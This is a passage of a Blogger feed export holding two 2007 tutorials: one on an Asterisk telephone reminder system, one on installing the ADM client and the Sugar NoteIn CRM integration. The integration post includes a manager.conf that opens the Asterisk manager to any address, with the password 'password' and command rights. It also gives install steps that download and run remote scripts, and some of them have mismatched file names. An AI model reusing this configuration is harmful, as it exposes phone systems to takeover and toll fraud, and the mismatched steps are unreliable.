explain who's calling and what the purpose of the call is. Once you've recorded your message, press the pound key to end the recording. You can replay or rerecord the reminder if desired while you're in this step of the reminder creation process.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Entering the Callback Number.&lt;/b&gt; When prompted for the reminder callback number, there are a couple of things to keep in mind. First, if you've specified "local" as the trunk to use for reminders in the reminder.php script, then the phone numbers can be entered in any format supported by your dialplan. Press the pound key after entering the appropriate number. The calls will be placed using the trunks specified in your dialplan rules. The one exception is extensions on your local Asterisk system since these can't be routed by Asterisk@Home or TrixBox systems using your outbound calls dialplan rules. The way we handle extensions is by examining the length of the phone number. At the top of reminder.php, you can specify the maximum number of digits for local extensions by setting $extensionmaxdigits. So long as the callback number is less than or equal to this number of digits, the system has the smarts to correctly route the call to a local extension. &lt;/p&gt;  &lt;p&gt;If you have designated a particular trunk for placement of reminder calls, then you'll need to make certain that the format of the phone numbers entered for reminders on your system matches a dial string supported for this outbound trunk in your dialplan. For example, if this trunk requires that calls be entered with a 1 and then an area code and 7-digit number, then that is the only format that should be used for entering callback numbers in your reminder system. Again, the one exception is calls to local extensions. So long as the number of a local extension is entered with less than or equal the number of digits set for the $extensionmaxdigits variable in reminder.php, the call will be routed properly to the local extension regardless of the trunk setting.&lt;/p&gt;  &lt;p&gt;Finally, here's a shortcut that can be used if the phone you're using to schedule the reminder is the same one on which you want to get the reminder callback. In this case, just press the pound key when prompted for the number to which to deliver the reminder message. This will set the callback number as the caller ID of the phone you used to schedule the call. If it's a local extension, then the caller ID will be set to the local extension number of the phone from which you placed the reminder scheduling call. Just be sure your $extensionmaxdigits is set correctly or calls to local extensions will fail.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Entering the Date of the Reminder.&lt;/b&gt; Once you accept the reminder message, you'll be prompted to enter the date on which this reminder will be delivered. Dates are entered using a four-digit year, then a two-digit month, and then a two-digit day &lt;i&gt;using the time zone of the Asterisk system running the Telephone Reminders System&lt;/i&gt;. There is some error correction but not much. You obviously can't schedule reminders in the past! And you don't need to press the pound key after entering the eight digits. Beginning in version 2.5, you now can press the pound key (#) instead of entering an 8-digit date, and the system will set the reminder date to today. Once you've entered a date, the system will tell you what date you entered including the day of the week. If the entry is correct, just press 1 to move on.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Entering the Time of the Reminder.&lt;/b&gt; Now you'll be prompted to enter the delivery time for your reminder. Times are entered as a two-digit hour and two-digit minute &lt;i&gt;using the time zone of the Asterisk system running the Telephone Reminders System&lt;/i&gt;. For times less than 1200, you will be prompted whether you meant AM or PM. For those that understand military time, you can avoid this step by entering times using the format: 1345 which means 1:45 p.m. You don't need to press the pound key after entering the four-digit time for delivery of your reminder. Keep in mind that you cannot schedule a reminder for delivery in the first five minutes after midnight. Other times "in the midnight hour" should be entered in the format: 0045 which means 12:45 a.m. Keep in mind that reminder times always must be at least 5 minutes in the future. Finally, you cannot schedule two reminders for the exact same date and time for delivery to the same phone number. Once you enter a delivery time, the system will play back both the date and time for the reminder as a precaution. Press 1 to accept your entries.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Entering Recurring Reminders.&lt;/b&gt; Beginning with version 3, you now will be prompted whether to schedule (1) a single reminder, (2) a recurring reminder every weekday (M-F), (3),a recurring reminder every day, (4) a recurring reminder every week, (5) a recurring reminder every month, or (6) a recurring reminder every year. Once you make a selection, your reminder will be scheduled. If you choose an option other than 1 through 6, a single reminder will be scheduled. &lt;/p&gt;  &lt;p&gt;&lt;b&gt;Where Reminders Are Stored.&lt;/b&gt; There are actually two files that make up each reminder: the .call file which places the actual call and the .gsm file which is the reminder message itself. The file naming convention is HourMinute.Date.PhoneNumber with either a .call or .gsm extension. The sound files are all stored in /var/lib/asterisk/sounds/custom. For recurring reminders, duplicates of the .call script and the .gsm message are stored in /var/spool/asterisk/recurring with the date of the &lt;i&gt;next&lt;/i&gt; recurring reminder. At midnight on the next scheduled date, the two files are copied to the /var/spool/asterisk/reminders and /var/lib/asterisk/sounds/custom folders respectively. Then the next scheduled reminder date is set in the two filenames. For single reminders, prior to the delivery date of the reminder message, the .call file is stored in /var/spool/asterisk/reminders. Then, at 12:03 am on the date the reminder is scheduled for delivery, the run_reminders script in /var/lib/asterisk/agi-bin moves the affected .call files to /var/spool/asterisk/outgoing. The .call files in the outgoing directory are reviewed every minute of the day by Asterisk. By examining the time stamp of the file, Asterisk looks for a match with the current hour and minute of the day. Once the time for the call arrives, Asterisk processes the .call script and places the call. All dialing retries are handled internally by Asterisk with no user or program control so it's important to set your default values correctly in the reminder.php script as explained above. Once the .call file is processed, Asterisk discards the file whether the call was successful or not. As noted above, the reminder message file is only discarded if the call is completed successfully. So, from time to time, you do need to review the contents of /var/lib/asterisk/sounds/custom and discard reminder messages, if any, with dates in the past. Note also that, if you begin scheduling a reminder and change your mind and hang up after recording a reminder message, that recorded message will still exist in /var/lib/asterisk/sounds/custom.&lt;/p&gt;  &lt;p&gt;Finally, a word of caution about the reminder message files: be very careful in deleting these files. The message files and .call files are linked by filename only, and there is no error detection or correction if the message file gets discarded before the time for the reminder call arrives. What would happen in such a situation is the call would be placed, someone would answer, Allison would say "please hold for an important reminder," and then there would be a brief silence followed by Allison saying "to repeat this reminder, press 1; otherwise, press 2" which is not entirely helpful. To delete a recurring reminder, delete both the .call and .gsm files from /var/spool/asterisk/recurring. Note that the .call file will have an additional extension which tells the recurring type, e.g. .daily, .weekly, etc.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Reminder and Wakeup Call Processing.&lt;/b&gt; It has been documented that flooding Asterisk with a bunch of .call scripts simultaneously can cause some of the scripts to be discarded without being executed. We hope this has been resolved in Asterisk 1.2.4, but just be alert to the possibility of a problem if multiple calls are scheduled at exactly the same time to different numbers. &lt;/p&gt;  &lt;p&gt;When you're first getting started with the reminder system, it's probably a good idea to fire up Asterisk's Command Line Interface (CLI): &lt;i&gt;asterisk -rvvvvv&lt;/i&gt;. Then you can watch as the reminders are scheduled and reminder calls are placed. Just schedule a reminder for five minutes from the time you begin the reminder call, and you'll be all set to give it a whirl. By default, there's also a reminder log file produced for the last reminder call placed. You can display this file with the following command: &lt;i&gt;cat /var/log/asterisk/reminder.txt&lt;/i&gt;.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;For Programmers Only.&lt;/b&gt; If you're just getting into PHP and AGI programming with Asterisk, then have a second look at reminder.php. In particular, take a look at the section of code that begins with &lt;i&gt;parse agi headers into array&lt;/i&gt;. As best we can tell, our initial tutorial on Telephone Reminders was the first version of this subroutine written in PHP that actually worked. We've tried to repeat our success here. If you review the log file (reminder.txt), you will see a listing of all the AGI headers which are passed by Asterisk to PHP. But this is the first code we've seen that correctly reads the headers into variables where you can actually retrieve the content. We call it a feature. For example, the commented out line (&lt;i&gt;$tmp = $agi['dnid']&lt;/i&gt;) shows the syntax to retrieve the DNID value from Asterisk. Just make a mental note that the parse AGI headers code in reminder.php actually works. Some of our previous code inherited the mistakes of others, but we've now taken the time to get this functioning properly &lt;i&gt;because we needed it for something else&lt;/i&gt;. Here's the complete list of AGI headers that can be saved to variables in your PHP code should the need ever arise:&lt;br /&gt;&lt;code&gt;&lt;br /&gt;read: agi_request: reminder.php&lt;br /&gt;read: agi_channel: SIP/204-6a1a&lt;br /&gt;read: agi_language: en&lt;br /&gt;read: agi_type: SIP&lt;br /&gt;read: agi_uniqueid: 1138010325.1367&lt;br /&gt;read: agi_callerid: "Line2" &lt;204&gt;&lt;br /&gt;read: agi_dnid: 123&lt;br /&gt;read: agi_rdnis: unknown&lt;br /&gt;read: agi_context: reminder9&lt;br /&gt;read: agi_extension: h&lt;br /&gt;read: agi_priority: 2&lt;br /&gt;read: agi_enhanced: 0.0&lt;br /&gt;read: agi_accountcode:&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;You'll also want to take note of a little quirk in Asterisk (compared to some PBXs). To decipher the extension which actually placed a call, you must parse the agi_channel variable for the data between the slash and hyphen characters since the DNID (dialed number identifier) returns the extension being called (as opposed to the originating extension) when an internal call is placed. Here's one PHP approach to get the answer which in this case happens to be extension 204. Regex wizards could probably save a line of code, but who cares.&lt;br /&gt;&lt;code&gt;&lt;br /&gt;$CallingID = substr(stristr($agi['channel'],"/"),1);&lt;br /&gt;$CallingID = substr($CallingID,0,strrpos($CallingID,"-"));&lt;br /&gt;&lt;/code&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Web Interface to Telephone Reminders&lt;/b&gt;. We've built a very simple web page that will let you review which reminders are pending on your system. Recurring reminders are NOT yet included excepted those scheduled for delivery today. You can access the web page directly at http://192.168.0.111/reminders/ using the IP address of your Asterisk system. To install the Telephone Reminders web interface, log into your Asterisk system as root and then issue the following commands:&lt;br /&gt;&lt;code&gt;&lt;br /&gt;cd /var/www/html&lt;br /&gt;mkdir reminders&lt;br /&gt;cd reminders&lt;br /&gt;wget http://nerdvittles.com/aah2/webreminder.zip&lt;br /&gt;unzip webreminder.zip&lt;br /&gt;rm webreminder.zip&lt;br /&gt;&lt;/code&gt;&lt;/p&gt;  &lt;p&gt;Be advised that we are just getting started with a web interface to the Telephone Reminders application. Stay tuned for loads of additional features!&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Security Reminder.&lt;/b&gt; If you plan to open the Asterisk web interface on your system to the public Internet, make sure to take security precautions to reduce the risk of a stranger trashing your system or running up your phone bill. Just click &lt;a href="http://nerdvittles.com/index.php?p=81"&gt;here&lt;/a&gt; and search for our articles on security to get your system up to speed.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Hot Tip!&lt;/b&gt; O'Reilly's must-have book, &lt;i&gt;&lt;a href="http://www.oreilly.com/catalog/asterisk/"&gt;Asterisk: The Future of Telephony&lt;/a&gt;&lt;/i&gt;, is still available for free download &lt;a href="http://www.alexburke.ca/asterisk-tfot.pdf"&gt;here&lt;/a&gt; under a &lt;a href="http://creativecommons.org/licenses/by-nc-nd/2.0/ca/"&gt;Creative Commons license&lt;/a&gt;. This is a cleaned up version of the original PDF which fixes pagination and compresses the file size to 3.9MB using Acrobat's &lt;i&gt;Reduce File Size&lt;/i&gt; tool. Requires at least Acrobat 4 to load. Special thanks to Alexander Burke for all the hard work cleaning this up.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Email Delivery of Reminders.&lt;/b&gt; Assuming you have email messaging working on your Asterisk system, Telephone Reminders has the ability to deliver an email copy of reminders to the recipient in addition to a phone call. Be advised that, if the phone call is never completed, the email copy of the reminder will &lt;i&gt;not&lt;/i&gt; be delivered. The reason for this is because Asterisk never passes the call to the context which handles delivery of the email message until the call is connected. So ... no connection, no email. However, if the recipient has an answering machine or voice mail, that would trigger delivery of the email message. &lt;/p&gt;  &lt;p&gt;Once you've installed the new contexts to support email messaging, step two is registering email addresses for extensions and phone numbers to which you want email reminders delivered. Log in to your Asterisk server as root, and start up the Command Line Interface (CLI): &lt;i&gt;asterisk -r&lt;/i&gt;. For each extension and phone number for which you want to activate email reminders, enter a command at the CLI prompt that looks like this: &lt;i&gt;database put EMAIL 6781234567 joe@schmo.com&lt;/i&gt; where &lt;i&gt;6781234567&lt;/i&gt; is the phone number of the reminder recipient and &lt;i&gt;joe@schmo.com&lt;/i&gt; is the recipient's email address. You can display all existing EMAIL addresses that have been entered into your Asterisk database with this command: &lt;i&gt;database show EMAIL&lt;/i&gt;. If you need to modify an existing entry, simply delete it and reenter it. To delete an existing entry, use the following syntax: &lt;i&gt;database del EMAIL 6781234567&lt;/i&gt;.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;MIME-Construct: Wherefore Art Thou?&lt;/b&gt; A Linux utility, MIME-Construct, made it easy to convert images (like faxes) to PDF documents and also facilitated the emailing of just about any other document including reminder messages. Unfortunately, it came up missing in TrixBox, and it's difficult to install because of all the Linux dependencies. So here's a simple solution that restores the original functionality of MIME-construct thanks to the programming genius of Rob Thomas. Since Rob's &lt;i&gt;fax-process.pl&lt;/i&gt; code (included in freePBX) mimics the old MIME-construct application, the simple solution was just to tweak it a bit for Nerd Vittles and TrixBox compatibility and then copy a renamed version into the PATH (remember the DOS PATH!) on your Linux box. Log in as root and issue these commands, and you'll be back in the mime-construct business with TrixBox:&lt;br /&gt;&lt;code&gt;&lt;br /&gt;cd /usr/local/bin&lt;br /&gt;wget http://nerdvittles.com/trixbox123/mime-construct&lt;br /&gt;chmod +x mime-construct&lt;/code&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-4442403007703907145?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/4442403007703907145/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=4442403007703907145' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4442403007703907145'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4442403007703907145'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2007/09/introducing-telephone-reminders-30-free.html' title='Introducing Telephone Reminders 3.0: The Free Asterisk Telephone Reminder System'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-8597010903225324600</id><published>2007-09-17T13:06:00.000-07:00</published><updated>2007-09-17T13:09:01.654-07:00</updated><title type='text'>Note In</title><content type='html'>&lt;div style="text-align: left;" class="csc-header csc-header-n1"&gt;&lt;h1 class="csc-firstHeader"&gt;Client installation and configuration :&lt;/h1&gt;&lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt; &lt;/p&gt;&lt;div&gt; &lt;/div&gt;&lt;h4 style="text-align: left;"&gt;ADM ( Asterisk Desktop Manager )&lt;/h4&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;h4 style="text-align: left;"&gt;Installation linux/Unix :&lt;/h4&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;h4 style="text-align: left;"&gt;Step 1 - Adm Installation :&lt;/h4&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;span style="font-weight: bold;"&gt;Download the file&lt;/span&gt; &lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/ADM_unix_1_1_jre1_5_bundle.sh" target="_top" class="download"&gt;&lt;img src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/download.gif" alt="" /&gt;here&lt;/a&gt;.&lt;br /&gt;Unzip it, then run it.&lt;br /&gt;After this, download our configuration script  &lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/script_install.sh" target="_top" class="download"&gt;&lt;img src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/download.gif" alt="" /&gt;here&lt;/a&gt;, then run it. &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;pre&gt;    wget &lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/ADM_unix_1_1_jre1_5_bundle.sh" target="_blank"&gt;www.modulis-voip.com/fileadmin/uploads/notein/ADM_unix_1_1_jre1_5_bundle.sh&lt;/a&gt;&lt;/pre&gt; &lt;pre&gt;     gunzip ADM*.gz&lt;/pre&gt; &lt;pre&gt;    sh ADM_unix_1_1.sh &lt;/pre&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;h4 style="text-align: left;"&gt;Step 2 - Automatic configuration of adm :&lt;/h4&gt;&lt;div style="text-align: left;"&gt; &lt;pre&gt;    wget &lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/script_install.sh" target="_blank"&gt;www.modulis-voip.com/fileadmin/uploads/notein/script_install.sh&lt;/a&gt;&lt;/pre&gt; &lt;pre&gt;    sh configure_adm.sh&lt;/pre&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;Run adm &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;pre&gt;    adm&lt;/pre&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;Note : If you don't use the configuration script, don't forget to exec the following commands :&lt;/p&gt;&lt;div style="text-align: left;"&gt;&lt;blockquote style="margin-bottom: 0pt; margin-top: 0pt;"&gt;&lt;pre&gt;cd /usr/bin&lt;/pre&gt;&lt;/blockquote&gt;&lt;blockquote style="margin-bottom: 0pt; margin-top: 0pt;"&gt;&lt;pre&gt;ln -s firefox mozilla-firefox&lt;/pre&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;If you got a problem, &lt;span style="font-weight: bold;"&gt;close&lt;/span&gt; then restart adm. &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;pre&gt; &lt;/pre&gt; &lt;/div&gt;&lt;h4 style="text-align: left;"&gt;Windows Installation :&lt;/h4&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;h4 style="text-align: left;"&gt;Step 1 - adm installation :&lt;/h4&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;Download the file &lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/ADM_windows_1_1_jre1_5_bundle.exe" target="_top" class="download"&gt;&lt;img src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/download.gif" alt="" /&gt;here&lt;/a&gt;.&lt;br /&gt;Unzip it, then run it.&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;h4 style="text-align: left;"&gt;Step 2 - Manual configuration of adm :&lt;/h4&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;Run ADM.&lt;br /&gt;Right click on the ADM icon in your taskbar. &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt;&lt;blockquote style="margin-bottom: 0pt; margin-top: 0pt;"&gt;&lt;blockquote style="margin-bottom: 0pt; margin-top: 0pt;"&gt;&lt;p class="bodytext"&gt;&lt;img src="http://www.modulis-voip.com/uploads/RTEmagicC_Clic_ADM.jpg.jpg" style="width: 91px; height: 33px;" alt="" /&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;Go to : Configurations -&gt; Edit current -&gt; Asterisk&lt;br /&gt;-&gt; Manager &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;img src="http://www.modulis-voip.com/uploads/RTEmagicC_Clic_ADM_Menu.jpg.jpg" style="width: 300px; height: 145px;" alt="" /&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;Complete this fields :&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;pre&gt; Hostname :  servervoip.hostname.com&lt;/pre&gt; &lt;pre&gt; port : 5038&lt;/pre&gt; &lt;pre&gt; username : adm&lt;/pre&gt; &lt;pre&gt; password : password&lt;/pre&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;br /&gt;-&gt; Extensions &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;pre&gt; Context : EXTENSION-CONTEXT exemple : "from-sip" ou "default"&lt;/pre&gt; &lt;pre&gt; Source : SIP/ext       exemple : SIP/202&lt;/pre&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;br /&gt;-&gt; Browser pop-up &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt; Check "Enable Incomming records" &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;pre&gt; URL :  "http://servercrm.hostname.com/sugarcrm_path/pp_index.php?number=%number%"&lt;/pre&gt; &lt;pre&gt; Usually check "Disable crm popup for internal calls" too.&lt;/pre&gt; &lt;pre&gt; "Disable crm popup for outgoing calls" Check thi one will disable pop for outgoing calls.&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Step 1 - CRM server installation :&lt;/h3&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;On Linux/Unix servers :&lt;br /&gt;&lt;br /&gt; Download .tar file  &lt;a href="http://www.modulis-voip.com/en/products/modulis-voip-applications/sugar-notein/download/" target="_top" class="internal-link"&gt;&lt;img src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/internal_link.gif" alt="" /&gt;here&lt;/a&gt;.&lt;br /&gt; Unzip and run the file : install_noteIn.sh&lt;br /&gt; With bash commands : &lt;/p&gt;&lt;div style="text-align: left;"&gt;     wget &lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/Sugar_NoteIn_beta1.tar" target="_blank"&gt;www.modulis-voip.com/fileadmin/uploads/notein/Sugar_NoteIn_beta1.tar&lt;/a&gt;     tar -xvf Sugar_NoteIn_beta1.tar     chmod +x install_noteIn.sh     ./install_noteIn &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;Windows servers or Manual installation :&lt;br /&gt; Download .tar file &lt;a href="http://www.modulis-voip.com/en/products/modulis-voip-applications/sugar-notein/download/" target="_top" class="internal-link"&gt;&lt;img src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/internal_link.gif" alt="" /&gt;here&lt;/a&gt;.&lt;br /&gt; Copy/Past files pp_index.php and pp_contact/ into your sugarcrm directory. &lt;/p&gt;&lt;div style="text-align: left;"&gt;     wget &lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/Sugar_NoteIn_beta1.tar" target="_blank"&gt;www.modulis-voip.com/fileadmin/uploads/notein/Sugar_NoteIn_beta1.tar&lt;/a&gt;     tar -xvf Sugar_NoteIn_beta1.tar     chmod -R 755 src/*     cp src/* /path/to/sugarcrm/ &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Step 2 - Asterisk server installation :&lt;/h3&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;Into your directory /etc/asterisk, add the following modifications :&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;h4 style="text-align: left;"&gt;2.1.Add into manager.conf file&lt;/h4&gt;&lt;div style="text-align: left;"&gt;  cd /etc/asterisk  vim manager.conf [general]  enabled = yes  [adm]  secret = password  permit=0.0.0.0/0.0.0.0  permit=127.0.0.1/255.255.255.0  permit=172.21.1.32/255.255.255.0  read = system,call,log,verbose,command,agent,user  write = system,call,log,verbose,command,agent,user &lt;/div&gt;&lt;h4 style="text-align: left;"&gt;2.2.Add into /etc/asterisk/extensions.conf&lt;/h4&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;em&gt;&lt;strong&gt;This part is only needed if you want to use sugar NoteIn* with outgoing calls.&lt;/strong&gt;&lt;/em&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;Those  following lines are currently worling for FreePBX. In a custom dialplan, the lines you must add are close to this one.  &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;You just have to add this line in the right context on the right place : &lt;/p&gt;&lt;div style="text-align: left;"&gt; exten =&gt; s,n,Set(DIAL_NUMBER=${DIAL_NUMBER}) &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;Where "DIAL_NUMBER" is your dialplan variable. &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;h4 style="text-align: left;"&gt;2.2.1  #Into [&lt;strong&gt;macro-exten-vm] context :&lt;br /&gt;&lt;/strong&gt;&lt;/h4&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;em&gt;exten =&gt; s,n,Set(EXTTOCALL=${ARG2}) &lt;br /&gt;... &lt;br /&gt;exten =&gt; s,n,NoOp(-----------------------******************-----) &lt;br /&gt;exten =&gt; s,n,SetGlobalVar(ADM=${EXTTOCALL}) &lt;br /&gt;exten =&gt; s,n,NoOp(-----------------------******************-----) &lt;br /&gt;... &lt;br /&gt;exten =&gt; s,n,Set(CFUEXT=${DB(CFU/${EXTTOCALL})})&lt;/em&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;h4 style="text-align: left;"&gt;2.2.2  #Into &lt;strong&gt;[macro-dialout-trunk] context :&lt;br /&gt;&lt;/strong&gt;&lt;/h4&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;em&gt;exten =&gt; s,n,Set(DIAL_NUMBER=${ARG2})  &lt;/em&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;em&gt;...  &lt;/em&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;em&gt;exten =&gt; s,n,NoOp(-----------------------******************-----)  &lt;/em&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;em&gt;exten =&gt; s,n,SetGlobalVar(ADM=${DIAL_NUMBER})  &lt;/em&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;em&gt;exten =&gt; s,n,NoOp(-----------------------******************-----)  &lt;/em&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;em&gt;...  &lt;/em&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;em&gt;exten =&gt; s,n,Set(ROUTE_PASSWD=${ARG3})&lt;/em&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;h4 style="text-align: left;"&gt;2.2.3 #Into &lt;strong&gt;[macro-dialout-enum] context :&lt;br /&gt;&lt;/strong&gt;&lt;/h4&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt; exten =&gt; s,n,Set(DIAL_NUMBER=${DIAL_NUMBER})  &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;em&gt;... &lt;/em&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;em&gt;exten =&gt; s,n,NoOp(-----------------------******************-----)  &lt;/em&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;em&gt;exten =&gt; s,n,SetGlobaVar(ADM=${DIAL_NUMBER})  &lt;/em&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt; &lt;/div&gt;&lt;p style="text-align: left;" class="bodytext"&gt;&lt;em&gt;exten =&gt; s,n,NoOp(-----------------------******************-----)&lt;/em&gt; &lt;/p&gt;&lt;div style="text-align: left;"&gt;&lt;div class="csc-header csc-header-n1"&gt;&lt;h1 class="csc-firstHeader"&gt;Download page&lt;/h1&gt;&lt;/div&gt;&lt;div class="csc-textpic-text"&gt;&lt;p class="bodytext"&gt; &lt;/p&gt; &lt;h4&gt;&lt;strong&gt;Client :&lt;/strong&gt;&lt;/h4&gt; &lt;p class="bodytext"&gt;&lt;strong&gt;&lt;br /&gt;Linux/Unix version (27 Mo):&lt;/strong&gt; &lt;/p&gt; &lt;p class="bodytext"&gt;&lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/ADM_unix_1_1_jre1_5_bundle.sh" target="_top" class="download"&gt;&lt;img 